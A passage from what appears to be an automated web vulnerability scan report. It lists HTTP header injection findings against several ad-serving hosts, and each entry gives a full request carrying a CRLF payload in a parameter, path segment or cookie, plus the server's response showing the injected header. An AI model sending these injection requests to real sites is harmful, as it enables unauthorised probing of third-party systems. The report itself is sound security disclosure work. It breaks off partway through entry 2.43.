GET /adscgen/sta.php?survey_num=862189&site=287822477&code=51fdf%0d%0aa355c11c9ff HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://redcated/UNY/iview/287822477/direct/035244?click=http://www.burstnet.com/ads/ad11961a-map.cgi/BCPG176307.255935.305394/VTS=2FHwU.8ZAY/SZ=120X600A|160X600A/V=2.3S//REDIRURL=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1297439616; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-2_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-3_39826939-2-1_873085-63-3_39826938-2-1_40554329-9-5_868027-3-2_725047-19-2_40344942-26-1_850799-8-1_39824635-9-1_39992677-13-3_200194931312-3-1_200198267093-2-1_39912095-14-2_600001437951-2-1_39920001-4-1_39920005-4-1_39992639-13-2_851769-1-2_40646325-20-2_40646337-20-3_40586861-11-1_40601181-20-1_39992915-13-1_849772-17-1_849774-17-1; ES=823529-ie.pM-MG_844890-`:tqM-0_853829-y]GsM-Bi1_847435-l^GsM-!"1_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-4|1_866250-M.ktM-1UA_776149-m)mtM-5dA_865889->U$tM-tN_724925-js$tM-J_845473-nE/tM-0_791689-/qcsM-ySg1_848320-~'1uM-0_851229-8(1uM-0_851309-`kNuM-RW_847180-W:OuM-0_853029-8HQuM-2_851769-a(duM-q_850413-*7luM-0_851369-G1vtM-EE@_852149-*jtsM-n<{1_822109-|RIsM-55Y2

Response

HTTP/1.1 302 Found
Date: Mon, 14 Feb 2011 02:16:54 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a208.dl
Set-Cookie: CS1=deleted; expires=Sun, 14-Feb-2010 02:16:53 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-2_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-3_39826939-2-1_873085-63-3_39826938-2-1_40554329-9-5_868027-3-2_725047-19-2_40344942-26-1_850799-8-1_39824635-9-1_39992677-13-3_200194931312-3-1_200198267093-2-1_39912095-14-2_600001437951-2-1_39920001-4-1_39920005-4-1_39992639-13-2_851769-1-2_40646325-20-2_40646337-20-3_40586861-11-1_40601181-20-1_39992915-13-1_849772-17-1_849774-17-1_862189-1-1; expires=Thu, 05-Apr-2012 18:16:54 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_853829-y]GsM-Bi1_847435-l^GsM-!"1_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-4|1_866250-M.ktM-1UA_776149-m)mtM-5dA_865889->U$tM-tN_724925-js$tM-J_845473-nE/tM-0_791689-/qcsM-ySg1_848320-~'1uM-0_851229-8(1uM-0_851309-`kNuM-RW_847180-W:OuM-0_853029-8HQuM-2_851769-a(duM-q_850413-*7luM-0_851369-G1vtM-EE@_852149-*jtsM-n<{1_822109-|RIsM-55Y2_862189-9zquM-0; expires=Thu, 05-Apr-2012 18:16:54 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=atlas&survey_num=862189&site=4-287822477-&code=51fdf
a355c11c9ff

Content-Length: 33
Content-Type: text/html

/* /adsc/d862189/4/-1/randm.js */

2.36. http://amch.questionmarket.com/adscgen/sta.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload e6b37%0d%0aa14210b269c was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/sta.php?survey_num=862189&site=287822477&code=19855/e6b37%0d%0aa14210b269c4186 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://redcated/UNY/iview/287822477/direct/035244?click=http://www.burstnet.com/ads/ad11961a-map.cgi/BCPG176307.255935.305394/VTS=2FHwU.8ZAY/SZ=120X600A|160X600A/V=2.3S//REDIRURL=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1297439616; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-2_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-3_39826939-2-1_873085-63-3_39826938-2-1_40554329-9-5_868027-3-2_725047-19-2_40344942-26-1_850799-8-1_39824635-9-1_39992677-13-3_200194931312-3-1_200198267093-2-1_39912095-14-2_600001437951-2-1_39920001-4-1_39920005-4-1_39992639-13-2_851769-1-2_40646325-20-2_40646337-20-3_40586861-11-1_40601181-20-1_39992915-13-1_849772-17-1_849774-17-1; ES=823529-ie.pM-MG_844890-`:tqM-0_853829-y]GsM-Bi1_847435-l^GsM-!"1_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-4|1_866250-M.ktM-1UA_776149-m)mtM-5dA_865889->U$tM-tN_724925-js$tM-J_845473-nE/tM-0_791689-/qcsM-ySg1_848320-~'1uM-0_851229-8(1uM-0_851309-`kNuM-RW_847180-W:OuM-0_853029-8HQuM-2_851769-a(duM-q_850413-*7luM-0_851369-G1vtM-EE@_852149-*jtsM-n<{1_822109-|RIsM-55Y2

Response

HTTP/1.1 302 Found
Date: Mon, 14 Feb 2011 02:16:55 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a227.dl
Set-Cookie: CS1=deleted; expires=Sun, 14-Feb-2010 02:16:54 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-2_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-3_39826939-2-1_873085-63-3_39826938-2-1_40554329-9-5_868027-3-2_725047-19-2_40344942-26-1_850799-8-1_39824635-9-1_39992677-13-3_200194931312-3-1_200198267093-2-1_39912095-14-2_600001437951-2-1_39920001-4-1_39920005-4-1_39992639-13-2_851769-1-2_40646325-20-2_40646337-20-3_40586861-11-1_40601181-20-1_39992915-13-1_849772-17-1_849774-17-1_862189-1-1; expires=Thu, 05-Apr-2012 18:16:55 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_853829-y]GsM-Bi1_847435-l^GsM-!"1_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-4|1_866250-M.ktM-1UA_776149-m)mtM-5dA_865889->U$tM-tN_724925-js$tM-J_845473-nE/tM-0_791689-/qcsM-ySg1_848320-~'1uM-0_851229-8(1uM-0_851309-`kNuM-RW_847180-W:OuM-0_853029-8HQuM-2_851769-a(duM-q_850413-*7luM-0_851369-G1vtM-EE@_852149-*jtsM-n<{1_822109-|RIsM-55Y2_862189-AzquM-0; expires=Thu, 05-Apr-2012 18:16:55 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=atlas&survey_num=862189&site=4-287822477-&code=19855/e6b37
a14210b269c
4186
Content-Length: 33
Content-Type: text/html

/* /adsc/d862189/4/-1/randm.js */

2.37. http://bidder.mathtag.com/notify [exch parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /notify

Issue detail

The value of the exch request parameter is copied into the x-mm-debug response header. The payload b7a2e%0d%0a2669694ed50 was submitted in the exch parameter. This caused a response containing an injected HTTP header.

Request

GET /notify?exch=b7a2e%0d%0a2669694ed50&id=5aW95q2jLzEvWlRabVlUbGxaVGt0WXpJeU55MDBOalF3TFRsbU5XRXRObVZpWkRFNE9USXhPREF4L05HUXpOekF5WW1NdE9ETTVaUzB3Tmprd0xUVXpOekF0TTJNeE9XRTVOVFl4TWprMS81OTM0NDM1NTMxNzIwNzUzMS8xMDk0NDkvMTAxNzcyLzUvbThsREliU1ZlNzdkUGpqWXBkdTFCZkNVNWFKNUNxdlZJZHc1OFcxRHRPOC8/G30W_HpUDJzTo5VAvU0finu0Bsc&price=AAABLiHmeN0RSsxpo1GHObFhTeUvm0-oCOAPtQ HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mt_mop=10001:1297389082|1:1297088631|10004:1297088634|11:1297045671|2:1297087036|3:1297045592|4:1296924138|5:1297087118|9:1297087161; uuid=4d3702bc-839e-0690-5370-3c19a9561295; ts=1297647383

Response

HTTP/1.1 404 Not found
Date: Mon, 14 Feb 2011 02:01:37 GMT
Server: MMBD/3.4.3.2
Content-Type: text/html; charset=utf-8
Content-Length: 18
x-mm-debug: exchange not found - b7a2e
2669694ed50

x-mm-host: ewr-bidder-x2
Connection: keep-alive

Request not found

2.38. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 37f57%0d%0a3fb48ff6f67 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2204319&PluID=0&w=728&h=90&ord=121268265541127022&ucm=true&ncu=$$http://pixel.mathtag.com/click/img?mt_aid=121268265541127022&mt_id=109450&mt_adid=100341&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http://www.mediamath.com$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?.s1hABkhFwA1TX4AAAAAAP9.HwAAAAAAAAAAAAYAAAAAAA8AAwABFH32IwAAAAAARqMHAAAAAADDeikAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABeAQ8AAAAAAAIAAwAAAAAAw.UoXI-i8z9cukkMAqv-PwEAAAAAAAVAZmZmZmZmEEABAAAAAAAFQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACy4jPc7mqhCV1QdvLC4KD5ygPw8Rr.jBeWye7lAAAAAA==,,http%3A%2F%2Fwww.drudgereport.com%2F,Z%3D728x90%26s%3D1515801%26r%3D1%26_salt%3D1804486375%26u%3Dhttp%253A%252F%252Fwww.drudgereport.com%252F,6fcbc4c0-37da-11e0-8341-003048d6d89e
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f; A3=gSdsafy50aSU00003gPVtafzY0bnA00001gDQzahdx07ZZ00001fFb9afAF02WG00001f+JvabEk02WG00002h5iUafy507l00000Sh5j3afvK07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gL2MadKj0bdR00001gYRSaeKR09sO00001gDa8aeXd0aA900001g7VJafdh08.I00001hghLaeVW09SF00002gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001heXeaf5V0c9M00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001heXfagzX0c9M00001heXgagXR0c9M00002h6moagvf0aMN00002gSdkafvD0aSU00001gHrHaeKS09sO00001gK8raeXe0aA900001heXhaf5V0c9M00003heXiagzX0c9M00004gSdmafy60aSU00002gSdnafwN0aSU00003heXjafWs0c9M00001hbwIaeVY09SF00002gvKEacgY0c9M00001heXaaf9P0c9M00001gSdpafvK0aSU00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001g+nBaeUD02Hn00001; B3=8bvZ0000000001t68qiu0000000002t689PS000000000St87oaf0000000001t889PT000000000.t88fq40000000001t884fB0000000001t88mb20000000001t48i440000000001t28bwx0000000001t48fq50000000003t87PrH0000000001t782790000000002t5852G0000000003sS8fq70000000001t88qav0000000008tb7dNH0000000002sZ86Bm0000000001t684ZE0000000001t67GHq0000000001s.8j4q0000000001t67FCH0000000001s.84ZF0000000002t68nAl0000000002t68cVQ0000000001sV82980000000001t38fq20000000003t8852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY8fq30000000002t88qaw0000000004tc7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS8qay0000000001t787H10000000001td8n7e0000000002tb; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; eyeblaster=BWVal=1948&BWDate=40587.401238&debuglevel=&FLV=10.2154&RES=128&WMPV=037f57%0d%0a3fb48ff6f67

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=1948&BWDate=40587.401238&debuglevel=&FLV=10.2154&RES=128&WMPV=037f57
3fb48ff6f67
; expires=Sat, 14-May-2011 20: 33:39 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=gPVtafzY0bnA00001gSdsafy50aSU00003gLnTaeKR09sO00001h5j3afvK07l00000.h5iUafy507l00000Sf+JvabEk02WG00002fFb9afAF02WG00001gDQzahdw07ZZ00001gYyfadw90cvM00001gDa8aeXd0aA900001gYRSaeKR09sO00001gL2MadKj0bdR00001hghLaeVW09SF00002g7VJafdh08.I00001h802ae7k0c6L00001gKXMaepH0bdR00001gFjwaeKR09sO00001gKXNaepP0bdR00001gYx+adw90cvM00001heXeaf5V0c9M00001heXfagzX0c9M00001gy3.ach00c9M00001gHrHaeKS09sO00001gSdkafvD0aSU00001h6moagvf0aMN00002heXgagXR0c9M00002heXhahnN0c9M00004gK8raeXe0aA900001gSdmafy60aSU00002heXiagzX0c9M00004heXjafWs0c9M00001gSdnafwN0aSU00003hbwIaeVY09SF00002gSdpafvK0aSU00001heXaaf9P0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001g+nBaeUD02Hn00001gNQ4ae7r0c9M00001ge4Hack+0bM000001; expires=Sat, 14-May-2011 20:33:39 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=89PS000000000St88qiu0000000002t68bvZ0000000001t689PT000000000.t87oaf0000000001t884fB0000000001t88fq40000000001t88fq50000000003t88bwx0000000001t48i440000000001t28mb20000000001t4852G0000000003sS82790000000002t57PrH0000000001t78fq70000000001t886Bm0000000001t67dNH0000000002sZ8qav0000000009td8j4q0000000001t67GHq0000000001s.84ZE0000000001t684ZF0000000002t67FCH0000000001s.8cVQ0000000001sV8nAl0000000002t682980000000001t384U10000000001t6852N0000000001s.8fq20000000003t88fq30000000002t86o.Q0000000001sY87ma0000000001s.8i430000000001t27gi30000000001sG8qaw0000000004tc852z0000000001sS8qay0000000001t7852A0000000001sS8n7e0000000002tb87H10000000001td; expires=Sat, 14-May-2011 20:33:39 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sat, 14-May-2011 20:33:39 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 14 Feb 2011 01:33:39 GMT
Connection: close
Content-Length: 2219

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

2.39. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 7882f%0d%0adcb3cfdd72c was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=&$=7882f%0d%0adcb3cfdd72c&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:7882f
dcb3cfdd72c
;expires=Mon, 14 Feb 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=64
Expires: Mon, 14 Feb 2011 01:30:24 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 4228

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=916;var zzPat=',7882f

...[SNIP]...

2.40. http://c7.zedo.com/utils/ecSet.js [v parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The value of the v request parameter is copied into the Set-Cookie response header. The payload cefd9%0d%0a310d8c3cc8d was submitted in the v parameter. This caused a response containing an injected HTTP header.

Request

GET /utils/ecSet.js?v=cefd9%0d%0a310d8c3cc8d&d=.zedo.com HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFad=0:0:0; FFcat=305,2942,9:305,4506,17:1120,1,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: cefd9
310d8c3cc8d
;expires=Wed, 16 Mar 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
ETag: "2971d9-1f5-47f29204ac3c0"
Vary: Accept-Encoding
X-Varnish: 1725802099
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=2283
Date: Mon, 14 Feb 2011 01:29:12 GMT
Connection: close



2.41. http://d.adroll.com/pixel/DBLH4FNWEJG3HHKBYW3CFN/LJ7DC3I6ENDUDJRX7PVZRX [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/DBLH4FNWEJG3HHKBYW3CFN/LJ7DC3I6ENDUDJRX7PVZRX

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 148bc%0d%0a00a581bb834 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /pixel/148bc%0d%0a00a581bb834/LJ7DC3I6ENDUDJRX7PVZRX?pv=1280671358.1085205&cookie=& HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://aboutecho.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=7eac527dab8242660d6ce169dd8ca402

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.67
Date: Mon, 14 Feb 2011 14:35:08 GMT
Connection: keep-alive
Set-Cookie: __adroll=7eac527dab8242660d6ce169dd8ca402; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/148bc
00a581bb834
/LJ7DC3I6ENDUDJRX7PVZRX/DSTFX4IPGNDVXKJZOC5QMN.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


2.42. http://d.adroll.com/pixel/DBLH4FNWEJG3HHKBYW3CFN/LJ7DC3I6ENDUDJRX7PVZRX [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/DBLH4FNWEJG3HHKBYW3CFN/LJ7DC3I6ENDUDJRX7PVZRX

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 90fad%0d%0a5b0b82ad641 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /pixel/DBLH4FNWEJG3HHKBYW3CFN/90fad%0d%0a5b0b82ad641?pv=1280671358.1085205&cookie=& HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://aboutecho.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=7eac527dab8242660d6ce169dd8ca402

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.67
Date: Mon, 14 Feb 2011 14:35:09 GMT
Connection: keep-alive
Set-Cookie: __adroll=7eac527dab8242660d6ce169dd8ca402; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/retarget/DBLH4FNWEJG3HHKBYW3CFN/90fad
5b0b82ad641
/pixel.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


2.43. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload ae973%0d%0a0345b07197e was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

